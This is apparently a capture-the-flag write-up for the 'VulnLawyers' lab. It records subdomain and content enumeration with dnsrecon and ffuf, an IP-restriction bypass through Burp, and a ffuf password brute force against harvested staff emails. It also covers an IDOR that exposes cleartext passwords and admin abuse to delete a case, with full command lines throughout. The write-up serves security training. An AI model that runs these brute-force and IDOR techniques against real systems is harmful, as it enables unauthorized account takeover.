Skip to content

Latest commit

 

History

History
21 lines (21 loc) · 3.41 KB

vulnLawyersSteps.md

File metadata and controls

21 lines (21 loc) · 3.41 KB
  1. Sudomain Discovery
    1. dnsrecon -d vulnlawyers.co.uk -D ~/wordlists/subdomains.txt -t brt!
      • Found data.vulnlawyers.co.uk and www.vulnlaywers.co.uk
    2. Searching on crt.sh
      • Nothing found.
    3. Accessing data.vulnlawyers.co.uk shows thisScreenshot Found Flag 1
  2. Content discovery on data.vulnlaywers.co.uk
    1. ffuf -w ~/wordlists/content.txt -t 1 -p 0.1 -H "Cookie: ctfchallenge=eyJkYXRhIjoiZXlKMWMyVnlYMmhoYzJnaU9pSjRZM3A2TTNKMmR5SXNJbkJ5WlcxcGRXMGlPbVpoYkhObGZRPT0iLCJ2ZXJpZnkiOiJhYmYwNzRmYWI0Yzk2YjA3OTM4ZDcxNGQ0N2VhZWIzNSJ9" -u http://data.vulnlawyers.co.uk/FUZZ -mc all -fc 404Screenshot
    2. Visited /users/and found some users' dataScreenshot Found Flag 3. This means that maybe there is a mail server running? No
  3. Content discovery on www.vulnlawyers.co.uk
    1. ffuf -w ~/wordlists/content.txt -t 1 -p 0.1 -H "Cookie: ctfchallenge=eyJkYXRhIjoiZXlKMWMyVnlYMmhoYzJnaU9pSjRZM3A2TTNKMmR5SXNJbkJ5WlcxcGRXMGlPbVpoYkhObGZRPT0iLCJ2ZXJpZnkiOiJhYmYwNzRmYWI0Yzk2YjA3OTM4ZDcxNGQ0N2VhZWIzNSJ9" -u http://www.vulnlawyers.co.uk/FUZZ -mc all -fc 404Screenshot
    2. Visited /login in the browser but it redirected me to /denied page that showed Acess is denied from your IP address error. Screenshot
    3. Visited /login but through Burp proxy, and this showed.Screenshot Found Flag 2
    4. Visited /laywers-only through Burp that directed me to /laywers-only-login then BOOM! A login protal.Screenshot
  4. But from the data.vulnlawyers.co.uk/users api we found, we have a list of emails that we can now bruteforce their passwords. Trying with the first user ffuf -w ~/wordlists/passwords.txt -t 1 -p 0.1 -X POST -d "email=marsha.blankenship%40vulnlawyers.co.uk&password=FUZZ" -H "Content-Type: application/x-www-form-urlencoded" -H "Cookie: ctfchallenge=eyJkYXRhIjoiZXlKMWMyVnlYMmhoYzJnaU9pSjRZM3A2TTNKMmR5SXNJbkJ5WlcxcGRXMGlPbVpoYkhObGZRPT0iLCJ2ZXJpZnkiOiJhYmYwNzRmYWI0Yzk2YjA3OTM4ZDcxNGQ0N2VhZWIzNSJ9" -u http://www.vulnlawyers.co.uk/lawyers-only-login -mc all -fc 401. Tried all users until I found Screenshot
  5. Logged in with [email protected] and summer as a username and a password respectively. Found this.ScreenshotFound Flag 4.
  6. Surfed the website to see what it does. Found a /lawyers-only-profile/ page that when seeing its page source, found this URL.Screenshot
  7. Visited /laywers-only-profile-details/4 and found that it reveals the password of every user in cleartext and it is also an IDOR vuln.Screenshot
  8. Tried some ids and found another flag on /laywers-only-profile-details/2 Screenshot Found Flag 5
  9. It seems that user shayne.cairns is an admin because he can delete a case.Screenshot
  10. Last flag showed after deleting the case with this admin account.ScreenshotFound Flag 6